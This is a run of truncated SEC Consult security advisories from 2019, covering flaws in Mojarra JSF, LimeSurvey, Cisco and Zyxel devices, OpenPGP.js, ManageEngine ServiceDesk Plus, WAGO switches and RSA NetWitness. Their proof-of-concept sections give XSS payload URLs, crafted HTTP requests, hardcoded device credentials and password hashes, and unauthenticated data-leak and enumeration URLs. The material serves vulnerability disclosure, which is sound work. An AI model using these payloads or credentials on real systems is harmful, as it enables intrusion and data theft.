matches = re.findall( r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE)
print("Found version: {0}".format(matches[-1]))
b) UNION SQL Injection in evenements.php (CVE-2019-16744)
The script evenements.php uses the unsanitized para
SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF
SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
===
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
Eclipse Mojarra JSF
vulnerable version: 2.2 & 2.3
fixed version:
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING
https://github.com/eclipse-ee4j/mojarra
CVE number: -
impact: Medium
homepage: https://javaserverfaces.github.io/
found: 2018-11-12
by: Jean-Benjamin Rousseau (Office Zurich)
Guillaume Crouquet (Office Zurich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"JavaServer Faces technology simplifies building user interfaces for
JavaServer applications. Developers can build web applications by
assembling reuseable UI components in a page; connecting these
components to an application data source; and wiring client-generated
events to server-side event handlers. This project provides information
on the continued development of the JavaServer Faces specification.
JavaServer Faces (JSF) is a JCP Standard technology for authoring
component based user interfaces on the Java EE platform."
Source: https://javaee.github.io/javaserverfaces-spec/
Business recommendation:
By exploiting the vulnerability documented in this advisory, an attacker
can execute arbitrary scripts in the context of the web application in the
victim's browser. Besides performing arbitrary actions within the
application with the victim's account or manipulating the application's
interface, the attacker can potentially steal session tokens, redirect
the victim to external pages and perform attacks against their browser.
SEC Consult recommends users to implement the available patches.
Vulnerability overview/description:
---
The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3
lacks input validation on the javax.faces.ClientWindow parameter which can
lead to reflected cross-site scripting (XSS) under certain conditions.
Mojarra JSF v2.2 and v2.3 are respectively the user interface
standards for Java EE 7 and Java EE 8.
The vulnerability is not directly exploitable in Mojarra JSF v2.2
and v2.3. However, different frameworks based on this library and having
a custom implementation of the Faces-Request HTTP headers for AJAX requests
might be affected. PrimeFaces v6.0 is one example of a vulnerable framework.
This vulnerability affects the web applications fulfilling the following
conditions:
- Usage of a framework based on Mojarra JSF v2.2 or v2.3
- Usage of AJAX requests in the web applications
- Custom implementation of the Faces-Request HTTP headers for AJAX requests
- Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter
set to "url" in the web.xml file:
javax.faces.CLIENT_WINDOW_MODE
url
Proof of concept:
-
In this proof of concept, the tests are based on PrimeFaces v6.0,
an open source framework for JSF. Other frameworks based on
Mojarra JSF 2.2 or 2.3 might also be affected.
Step 1: Generate an AJAX request on the web application and intercept it.
---
POST
/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0
HTTP/1.1
Host: $IP
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://$IP
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close
javax.faces.partial.ajax=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0
---
Step 2: Transpose the POST parameters into GET parameters and
build a new URL with it.
http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0
Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.
http://
SEC Consult SA-20190912-0 :: Stored and reflected XSS vulnerabilities in LimeSurvey
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
===
title: Stored and reflected XSS vulnerabilities
product: LimeSurvey
vulnerable version: <= 3.17.13
fixed version: =>3.17.14
CVE number: CVE-2019-16172, CVE-2019-16173
impact: medium
homepage: https://www.limesurvey.org/
found: 2019-08-23
by: Andreas Kolbeck (Office Munich)
David Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or advanced
assessments with conditionals and quota management, LimeSurvey has got you
covered. LimeSurvey is 100% open source and will always be transparently
developed.
We can help you reach your goals."
Source: https://www.limesurvey.org/
Business recommendation:
LimeSurvey suffered from a vulnerability due to improper input
and output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code,
browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.
The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and additional issues are to be expected.
Vulnerability overview/description:
---
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and reflected cross-site scripting
vulnerability,
which allows an attacker to execute JavaScript code with the permissions of the
victim.
In this way it is possible to escalate privileges from a low-privileged account
e.g.
to "SuperAdmin".
Proof of concept:
-
1) Stored and reflected XSS vulnerabilities
Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey
groups.
Then create a survey group with a JavaScript payload in the title, for example:
test
When the survey group is being deleted, e.g. by an administrative user, the
JavaScript
code will be executed as part of the "success" message.
Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie which
contains the
CSRF token. The parameter "surveyid" is not filtered properly:
http://$host/index.php/admin/survey?mandatory=1=xxx=xxx%22%3E%3Cimg%20
src=x%20onerror=%22alert(document.cookie)%22%3E=listquestions=question
If the URL schema is configured differently the following payload works:
http://$host/index.php?r=admin/survey=1=xxx=
xxx">=listquestions=question
Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
version 3.17.13. It is assumed that older versions are affected as well.
Vendor contact timeline:
2019-08-29: Contacting vendor through
https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory
Solution:
-
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release
The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released
Workaround:
---
No workaround available.
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain
SEC Consult SA-20190904-0 :: Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X
SEC Consult Vulnerability Lab Security Advisory < 20190904-0 >
===
title: Multiple vulnerabilities
product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P,
Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160,
Cisco 160W
vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15
fixed version: see "Solution"
CVE number: -
impact: High
homepage: https://www.cisco.com/
found: 2019-05-15
by: T. Weber, S. Viehböck (Office Vienna)
IoT Inspector
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Securely connecting your small business to the outside world is as important
as connecting your internal network devices to one another. Cisco Small
Business RV Series Routers offer virtual private networking (VPN) technology
so your remote workers can connect to your network through a secure Internet
pathway."
Source:
https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html
Business recommendation:
We want to thank Cisco for the very quick and professional response and great
coordination. Customers are urged to update the firmware of their devices.
Vulnerability overview/description:
---
1) Hardcoded Credentials
The device contains hardcoded users and passwords which can be used to login
via SSH on an emulated device at least.
During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.
2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.19 is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of
the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo() buffer overflow")
was verified by using the MEDUSA scalable firmware runtime.
3) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scaleable firmware runtime.
4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in IoT Inspector report:
https://r.sec-consult.com/ciscoiot
Proof of concept:
-
1) Hardcoded Credentials
The following hardcoded hashes were found in the 'shadow' file of the firmware:
root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:9:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:9:7:::
[...]
The undocumented user 'debug-admin' is also contained in this file.
Starting the dropbear daemon as background process on emulated firmware:
---
# dropbear -E
# [1109] Running in background
#
# [1112] Child connection from :52718
[1112] /var must be owned by user or root, and not writable by
others
[1112] Password auth succeeded for 'debug-admin' from :52718
---
Log on via another host connected to the same network. For this PoC the
password of the debug-admin was changed in the 'shadow' file.
---
[root@localhost medusa]# ssh debug-admin@ /bin/ash -i
debug-admin@'s password:
/bin/ash: can't access tty; job control turned off
BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)
/tmp $
---
The 'debug-admin' user has the same privileges like 'root'. This can be
determined from the corresponding sudoers file in the firmware:
[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL
## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]
During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.
2) Known GNU glibc Vulnerabilities
GNU glibc version 2.19 contains multiple CVEs like:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472,
CVE-2015-5277, CVE-2015-8778, CVE-2015-87
SEC Consult SA-20190829-1 :: External DNS Requests in Zyxel USG/UAG/ATP/VPN/NXC series
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 >
===
title: External DNS Requests
product: Zyxel USG/UAG/ATP/VPN/NXC series
vulnerable version: see "Vulnerable / tested version"
fixed version: see "Solution"
CVE number: -
impact: medium
homepage: https://www.zyxel.com
found: 2019-06-19
by: Thomas Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.
We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."
Source: https://www.zyxel.com/about_zyxel/company_overview.shtml
Business recommendation:
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.
Vulnerability overview/description:
---
1) Information Disclosure via Unauthenticated External DNS Requests
A DNS request can be made by an unauthenticated attacker to either spam a DNS
service of a third party with requests that have a spoofed origin or probe
whether domain names are present on the internal network behind the firewall.
Proof of concept:
-
1) Information Disclosure via Unauthenticated External DNS Requests
By sending the following POST request an attacker can probe for the domain
"subdomain.domain.com":
---
POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
arip=subdomain.domain.com
---
The following GET request can be used for the same purpose:
---
GET
/redirect.cgi?arip=subdomain.domain.com_url=http%3a%2f%2f192.168.1.1%2f
HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
---
If the domain can be resolved, the response contains the resolved IP address
within the cookie value:
---
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2019 08:14:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Set-Cookie: arip=; path=/
Set-Cookie: zy_pc_browser=1; path=/
Connection: close
Content-Type: text/html
Content-Length: 9099
[...]
---
If the domain cannot be resolved, a redirection will be returned:
---
HTTP/1.1 302 Found
Date: Mon, 24 Jun 2019 08:11:57 GMT
Location: ext-js/app/view/login/useraware.html
Content-Length: 220
Connection: close
Content-Type: text/html; charset=iso-8859-1
[...]
---
Vulnerable / tested versions:
-
The following versions have been tested, other versions might be affected as
well:
Zyxel USG110ZLD 4.33
Zyxel USG210ZLD 4.33
Zyxel USG310ZLD 4.33
Zyxel USG1100 ZLD 4.33
Zyxel USG1900 ZLD 4.33
Zyxel USG2200-VPN ZLD 4.33
Zyxel UAG2100 ZLD 4.18
Zyxel UAG4100 ZLD 4.18
The vendor provided the following list of affected devices:
Zyxel ATP200
SEC Consult SA-20190829-0 :: Hardcoded FTP Credentials in Zyxel NWA/NAP/WAC wireless access point series
SEC Consult Vulnerability Lab Security Advisory < 20190829-0 >
===
title: Hardcoded FTP Credentials
product: Zyxel NWA/NAP/WAC wireless access point series
vulnerable version: see "Vulnerable / tested version"
fixed version: see "Solution"
CVE number: -
impact: medium
homepage: https://www.zyxel.com
found: 2019-06-19
by: Thomas Weber (Office Vienna)
IoT Inspector
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.
We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."
Source: https://www.zyxel.com/about_zyxel/company_overview.shtml
Business recommendation:
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.
Vulnerability overview/description:
---
1) Hardcoded FTP Credentials
An FTP service runs on the Zyxel wireless access point that contains the
configuration file for the WiFi network. This FTP server can be accessed with
hardcoded credentials that are embedded in the firmware of the AP.
When the WiFi network is bound to another VLAN, an attacker can cross the
network by fetching the credentials from the FTP server.
The credentials were found by doing an automated scan with IoT Inspector.
Proof of concept:
-
1) Hardcoded FTP Credentials
The username "devicehaecived" and the password "1234" can be used to access the
FTP server of the AP on port 21.
The content of the FTP server looks like the following listing:
---
$ ls
cert conf debug idp packet_trace script tmp wtp_image
---
The directory "conf" contains all configuration files which store the WiFi
SSIDs and passphrases.
Vulnerable / tested versions:
-
The following versions have been manually tested and were automatically
verified with IoT Inspector:
Zyxel NWA5121-NI5.50 patch 0 and earlier
Zyxel NWA5121-N 5.50 patch 0 and earlier
The vendor provided the following list of affected devices:
Zyxel WAC6103D-I5.50 patch 0 and earlier
Zyxel WAC6303D-S5.50 patch 0 and earlier
Zyxel WAC6502D-E5.50 patch 0 and earlier
Zyxel WAC6502D-S5.50 patch 0 and earlier
Zyxel WAC6503D-S5.50 patch 0 and earlier
Zyxel WAC6553D-E5.50 patch 0 and earlier
Zyxel WAC6552D-S5.50 patch 0 and earlier
Zyxel WAC5302D-S5.50 patch 0 and earlier
Zyxel NWA5123-AC5.50 patch 0 and earlier
Zyxel NWA5123-AC HD 5.50 patch 0 and earlier
Zyxel NWA5123-NI5.50 patch 0 and earlier
Zyxel NWA5301-NJ5.50 patch 0 and earlier
Zyxel NWA1302-AC5.50 patch 0 and earlier
Zyxel NWA1123-ACv2 5.50 patch 0 and earlier
Zyxel NWA1123-AC HD 5.50 patch 0 and earlier
Zyxel NWA1123-AC PRO5.50 patch 0 and earlier
Zyxel NAP1025.50 patch 0 and earlier
Zyxel NAP2035.50 patch 0 and earlier
Zyxel NAP3035.50 patch 0 and earlier
Zyxel NAP3535.50 patch 0 and earlier
Vendor contact timeline:
2019-06-26: Contacting vendor through secur...@zyxel.com.tw.
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor
confirmed receipt.
2019-07-03: Asked for an update; Vendor told that they
SEC Consult SA-20190822-0 :: Multiple Vulnerabilities in OpenPGP.js
SEC Consult Vulnerability Lab Security Advisory < 20190822-0 >
===
title: Multiple Vulnerabilities
product: OpenPGP.js
vulnerable version: <=4.2.0
fixed version: 4.3.0
CVE number: CVE-2019-9153, CVE-2019-9154, CVE-2019-9155
impact: critical
homepage: https://openpgpjs.org/
found: 2018-2019
by: Wolfgang Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"This project aims to provide an Open Source OpenPGP library in JavaScript so
it can be used on virtually every device. Instead of other implementations that
are aimed at using native code, OpenPGP.js is meant to bypass this requirement
(i.e. people will not have to install gpg on their machines in order to use the
library). The idea is to implement all the needed OpenPGP functionality in a
JavaScript library that can be reused in other projects that provide browser
extensions or server applications. It should allow you to sign, encrypt,
decrypt, and verify any kind of text - in particular e-mails - as well as
managing keys."
URL: https://openpgpjs.org/
Business recommendation:
SEC Consult was tasked by the German Bundesamt für Sicherheit in der
Informationstechnik (BSI) with conducting a security audit of the
Mailvelope browser extension as well as the parts of OpenPGP.js used by
Mailvelope. During the course of this audit multiple security vulnerabilities
with severities ranging from minor to critical have been identified. Some of the
vulnerabilities with higher severity are published as an advisory. A more
detailed description of the vulnerabilities as well as a description of other
vulnerabilities found during this project can be found in the report that has
been made available by the BSI:
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Mailvelope_Extensions/Mailvelope_Extensions_pdf.html
Vulnerability overview/description:
---
1) Message Signature Bypass (CVE-2019-9153)
OpenPGP defines several types of signatures with each type carrying a different
semantic. Signatures are implemented as packets and each signature packet can
contain subpackets.
To indicate a message signature (e.g. a signed e-mail), the signature type
"text" is used. The text signature packet verifies both its subpackets as well
as the signed text.
During verification of a message signature, OpenPGP.js does not verify that the
signature is of type text. An attacker could therefore construct a message that,
instead of a text signature, contains a signature of another type. As the input
required for the verification process depends on the signature type, an attacker
could use a signature with a type that only verifies its subpackets and does not
require additional input.
An attacker could construct a message that contains a valid "standalone" or
"timestamp" signature packet signed by another person. OpenPGP.js would
incorrectly assume this message to be signed by that person.
2) Information from Unhashed Subpackets is Trusted (CVE-2019-9154)
OpenPGP signature subpackets contain information related to a signature (e.g.
the creation timestamp). These subpackets may appear in a "hashed" and
"unhashed" subpacket container. While the information in the hashed subpackets
is signed, the unhashed subpackets are not cryptographically protected.
OpenPGP.js however does not distinguish between these subpackets. When parsing a
signature packet, the signed information is parsed first. When the unhashed
packets are read, the information from the hashed packets is overwritten.
An attacker could arbitrarily modify the contents of e.g. a key certification
signature or revocation signature. As a result, the attacker could e.g.
convince a victim to use an obsolete key for encryption.
3) Invalid Curve Attack (CVE-2019-9155)
The implementation of the Elliptic Curve Diffie-Hellman (ECDH) key exchange
algorithm does not verify that the communication partner's public key is
valid (i.e. that the point lies on the elliptic curve). This causes the
application to implicitly calculate the resulting secret key not based on the
specified elliptic curve but rather an altered curve. By carefully choosing
multiple altered curves (and therefore the resulting public key), and observing
whether decryption fails, an attacker can extract the victim's private key.
This attack requires the attacker to be able to provide multiple manipulated
messages and to observe whether decryption fails.
Proof of concept:
---
SEC Consult SA-20190821-0 :: Unauthenticated sensitive information leakage in Zoho Corporation ManageEngine ServiceDesk Plus
SEC Consult Vulnerability Lab Security Advisory < 20190821-0 >
===
title: Unauthenticated sensitive information leakage
product: Zoho Corporation ManageEngine ServiceDesk Plus
vulnerable version: v10 <10509
fixed version: v10 >=10509
CVE number: CVE-2019-15045, CVE-2019-15046
impact: Critical
homepage: https://www.manageengine.com/products/service-desk/
found: 2019-06-27
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"ServiceDesk Plus is a game changer in turning IT teams from daily
fire-fighting to delivering awesome customer service. It provides great
visibility and central control in dealing with IT issues to ensure that
businesses suffer no downtime. For 10 years and running, it has been
delivering smiles to millions of IT folks, end users, and stakeholders
alike."
Source: https://www.manageengine.com/products/service-desk/
Business recommendation:
The vendor provides a patched version and it should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a short
spot check has been performed and further critical issues are to be expected.
A workaround exists for mitigating vulnerability 1b (user enumeration).
Vulnerability overview/description:
---
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information
(CVE-2019-15046)
The software offers functionality (fosagent) that an unauthenticated attacker
can
exploit in order to gain information of internal "events". In our test it was
possible to access sensitive internal information (tickets) written by users of
this application in exchange with the support team. Depending on the contents of
the tickets, sensitive data might leak through this functionality. It is likely,
that it also depends on the configuration of ServiceDesk Plus which information
is
stored in those "events".
b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
It is possible to collect valid usernames by interacting with the
"AjaxDomainServlet" function of the application without prior authentication.
This vulnerability is useful to increase the efficiency of brute force attacks.
If the username is known, it is easier to find the corresponding password.
Furthermore, the servlet leaks information, whether the user is a locally
configured or a domain user and it also leaks the internal domain names of the
requested user account.
According to the vendor, the affected feature is intended behaviour and a
workaround in order to disable it has been provided (see further below).
Proof of concept:
-
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information
(CVE-2019-15046)
The "fosagent" functionality provides a "download-file" servlet which an
unauthenticated attacker can use in order to iterate through existing internal
"events". The information that can be downloaded looks like internal ticket
system
information and other data exchanged between users and the help desk support
team.
It is necessary to supply the "log-pos" parameter given a number followed by a
colon character and another number to access the corresponding event index. An
attacker can just increment those numbers and access different information.
https://$IP/fosagent/repl/download-file?log-pos=1:0
b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
The following URL can be used to efficiently enumerate user accounts configured
within ManageEngine ServiceDesk Plus. No prior authentication is required for
this functionality. The "search" parameter is used for supplying the user
account
name.
https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain=$USER
If the user exists and is a local user (configured within the web application)
it will show "Not in Domain" as a result. If the user exists and is a domain
user (e.g. LDAP) it will show the corresponding internal domain name as a
result.
If the page stays empty the user does not exist.
Vulnerable / tested versions:
-
Version 10 has been tested. The vendor did not confirm whether older releases
are
affected as well.
Vendor contact timeline:
2019-07-02: Contacting vendor through ManageEngine Security Response Center
(MESRC)
Uploaded security ad
SEC Consult SA-20190612-0 :: Multiple vulnerabilities in WAGO 852 Industrial Managed Switch Series
SEC Consult Vulnerability Lab Security Advisory < 20190612-0 >
===
title: Multiple vulnerabilities
product: WAGO 852 Industrial Managed Switch Series
vulnerable version: 852-303: https://www.wago.com
found: 2019-03-08
by: T. Weber (Office Vienna)
IoT Inspector
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."
Source: http://www.wago.us/wago/
Business recommendation:
SEC Consult recommends to immediately apply the available patches
from the vendor. A thorough security review should be performed by
security professionals to identify further potential security issues.
Vulnerability overview/description:
---
The industrial managed switch series 852 from WAGO is affected by multiple
vulnerabilities such as old software components embedded in the firmware.
Furthermore, hardcoded password hashes and credentials were also found by doing
an automated scan with IoT Inspector. Two vulnerabilities (CVE-2017-16544 and
CVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable
firmware runtime. The validity of the password hashes and the embedded keys were
also verified by emulating the device.
1) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.12.0 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scaleable firmware runtime.
2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.8 is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of
the discovered vulnerabilities (CVE-2015-0235, "GHOST") was verified by
using the MEDUSA scaleable firmware runtime.
3) Hardcoded Credentials (CVE-2019-12550)
The device contains hardcoded users and passwords which can be used to login
via SSH and Telnet.
4) Embedded Private Keys (CVE-2019-12549)
The device contains hardcoded private keys for the SSH daemon. The fingerprint
of the SSH host key from the corresponding SSH daemon matches to the embedded
private key.
Proof of concept:
-
1) Known BusyBox Vulnerabilities
BusyBox version 1.12.0 contains multiple CVEs like:
CVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325,
CVE-2015-9261, CVE-2016-2147 and more.
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device. A file with the name "\ectest\n\e]55;test.txt\a" was created
to trigger the vulnerability.
---
# ls "pressing "
test
]55;test.txt
#
---
2) Known GNU glibc Vulnerabilities
GNU glibc version 2.8 contains multiple CVEs like:
CVE-2010-0296, CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402,
CVE-2014-9761, CVE-2014-9984, CVE-2015-1472 and more.
The gethostbyname buffer overflow vulnerability (GHOST) was checked with the
help
of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was
compiled
and executed on the emulated device to test the system.
3) Hardcoded Credentials (CVE-2019-12550)
The following credentials were found in the 'passwd' file of the firmware:
root
No password is set for the account [EMPTY PASSWORD] admin
By using these credentials, it's possible to connect via Telnet and SSH on the
emulated device. Example for Telnet:
---
[root@localhost ~]# telnet 192.168.0.133
Trying 192.168.0.133...
Connected to 192.168.0.133.
Escape cha
SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
===
title: Authorization Bypass
product: RSA NetWitness
vulnerable version: <10.6.6.1, <11.2.1.1
fixed version: 10.6.6.1, 11.2.1.1
CVE number: CVE-2019-3724
impact: Medium
homepage: https://www.rsa.com
found: 2018-09-18
by: Mantas Juskauskas (Office Vilnius)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about
Business recommendation:
By exploiting the vulnerability documented in this advisory an unauthorized
attacker can access an administrative resource that may contain plain text
credentials to a 3rd party system.
The vendor provides a patch which should be installed on affected systems.
Vulnerability overview/description:
---
The authorization mechanism provided by the platform is prone to an
authorization
bypass vulnerability, which can be easily exploited by authenticated (but low
privileged) remote attackers for gaining access to administrative information
including plaintext passwords.
Proof of concept:
-
A logged-in low privileged user (e.g. with role Analyst) is able to access
an administrative resource by calling the following URL:
https://[host]/admin/system/whois/properties
After the above URL is accessed, the server returns the following HTTP response
that contains sensitive information to a 3rd party whois service including
plaintext passwords:
HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795
